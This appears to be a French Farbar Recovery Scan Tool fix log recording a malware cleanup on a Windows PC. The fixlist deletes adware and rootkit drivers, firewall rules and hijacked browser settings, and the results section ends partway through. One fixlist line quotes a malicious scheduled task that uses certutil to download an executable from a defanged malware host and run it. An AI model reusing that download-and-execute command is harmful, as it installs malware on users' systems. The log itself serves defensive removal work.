Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 13-07-2019
Exécuté par nathan (13-07-2019 17:46:57) Run:6
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\ASC
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
C:\Windows\windefender.exe
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\Winmon.sys
unlock: C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonFS.sys
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5BFEE7E8-5955-4B8A-BDD7-73E0EEC2F421}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{8CD74997-ACC6-45C8-B107-46E4F6D751A3}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6328ED04-3C49-48CD-B0BD-4126217142C8}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CEE6325F-CD04-472A-A536-FFF245610E26}
Task: {0477D444-D9D4-43CB-BA0E-DDCB5A844393} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {4107081B-99FB-4116-93B9-4D7DD56713CD} - \{248E71BD-FD6D-46BF-889A-874915A90435} -> Pas de fichier
Task: {DFB0A61A-AD16-40DE-864E-89AE6D3C641F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe
CHR HomePage: Default -> hxxp://www.funnysearching.com/
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [X]
S4 IUFileFilter; pas de ImagePath
U3 MBAMService; pas de ImagePath
2019-07-05 11:46 - 2019-07-07 11:49 - 000000000 ___HD C:\qtoie9GGJ2DkZWhu
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnigmaSoft
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\EnigmaSoft Limited
2019-07-03 11:21 - 2019-07-03 11:21 - 000000000 ____D C:\Program Files\EnigmaSoft
2019-06-29 11:15 - 2019-07-05 11:40 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-07-05 11:40 C:\Windows\SysWOW64\yzrnpmcu
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\IObit\ASC => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins" => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)